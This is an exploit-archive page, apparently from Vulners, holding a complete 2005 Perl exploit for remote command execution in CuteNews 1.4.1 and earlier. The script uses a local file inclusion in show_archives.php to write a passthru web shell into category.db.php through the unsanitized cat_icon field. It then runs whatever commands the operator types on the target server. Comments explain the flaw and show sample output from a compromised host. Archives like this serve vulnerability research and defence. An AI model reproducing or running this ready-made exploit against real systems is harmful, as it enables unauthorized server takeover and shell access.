Vulners
Lucene search
CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit
#!/usr/bin/perl
#
# cijfer-cnxpl - CuteNews <=1.4.1 Remote Command Execution
#
# Copyright (c) 2005 cijfer <[email protected]>
# All rights reserved.
#
## 1. example
#
# [cijfer@kalma:/research]$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news
# [[email protected] /]$ id;uname -a
# uid=48(apache) gid=48(apache) groups=48(apache),29000(web_serving) context=root:system_r:httpd_sys_script_t
# Linux server.xxxx.org 2.6.13-1.1532_FC4 #1 Thu Oct 20 01:30:08 EDT 2005 i686 i686 i386 GNU/Linux
# [[email protected] /]$
#
## 2. explanation
#
# this particular vulnerability is already known (sort of). a
# bug as exact as this one was found by rgod in CuteNews. the
# sole difference between his and my bug, are the files that
# are being exploited. while his was a bug using the following
# string:
#
# show_archives.php?template=../inc/ipban.mdu%00
#
# i found my bug in:
#
# show_archives.php?template=../inc/categories.mdu%00
#
## 3. the bug
#
# the bug lies in categories.mdu, located in the /inc/ folder
# of the cutenews directory.
#
# by using the 'template' variable in show_archives.php, we
# can include any local files. in this case, we're including
# categories.mdu. why? every .mdu file within the cutenews
# package has raw PHP code within it, that is not protected
# like the normal .php files.
#
# $template gets sanitized, but can be bypassed depending on
# php configuration! this is why on some 1.4.0's it works and
# on some others it does not. it all depends on configuration
# and whether or not register_globals needs to be on.
#
# if(file_exists("$cutepath/data/${template}.tpl")){ require("$cutepath/data/${template}.tpl"); }
# ...
#
# looking into categories.mdu, we notice the following to
# create our exploit string:
#
# if($member_db[1] != 1){ msg("error", "Access Denied", "You don't have permission to edit categories"); }
# ...
#
# elseif($action == "doedit")
# {
# ...
#
# cannot write arbitrary php code to $cat_name :(
#
# $cat_name = htmlspecialchars(stripslashes($cat_name));
# ...
#
# $cat_icon lacks sanitization :))!
#
# fwrite($new_cats, "$catid|$cat_name|$cat_icon|||\n");
# ...
#
# adding together all these elements, it is possible to inject
# php code into data/category.db.php and from there, use our
# injected code to either include a remote php shell, or run
# commands on the system.
#
##
#
# $Id: cijfer-cnxpl.pl,v 0.2 2005/12/26 03:36:00 cijfer Exp cijfer $
use IO::Socket;
use Getopt::Std;
use URI::Escape;
getopts("h:d:");
$host = $opt_h;
$dirs = $opt_d;
$good = 0;
if(!$host)
{
print "cijfer-cnxpl.pl by cijfer\n";
print "usage: $0 -h <hostname> -d [/directory]\r\n";
exit();
}
while()
{
print "[cijfer@".$host." /]\$ ";
while(<STDIN>)
{
$cmds=$_;
chomp($cmds);
last;
}
if(!$dirs)
{
$dirs = "/cutenews";
}
$string = $dirs;
$string .= "/show_archives.php?template=../inc/categories.mdu%00";
$string .= "&member_db[1]=1";
$string .= "&action=doedit"; #can be changed from 'doedit' to 'add' if no categories exist
$string .= "&cat_name=cijfer";
$string .= "&catid=1"; #can be changed to different value if starting catid != 0
$string .= "&cat_icon=%3C%3Fpassthru%28%24_GET%5Bcij%5D%29%3Bdie%28%29%3B%3F%3E";
$cijfer = $dirs;
$cijfer .= "/data/category.db.php?cij=";
$cijfer .= uri_escape("echo; ");
$cijfer .= "%20%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20"; # _START_
$cijfer .= uri_escape($cmds);
$cijfer .= "%3B%20%65%63%68%6F%20%5F%45%4E%44%5F"; # _END_
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
print $sock "GET $string HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
print $sock "GET $cijfer HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";
while($result = <$sock>)
{
if($sock =~ /^403/)
{
print "error: 403\n";
exit();
}
if($result =~ /^_END_/)
{
$good=0;
}
if($good==1)
{
print $result;
}
if($result =~ /^_START_/)
{
$good=1;
}
}
}
# milw0rm.com [2006-01-01]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1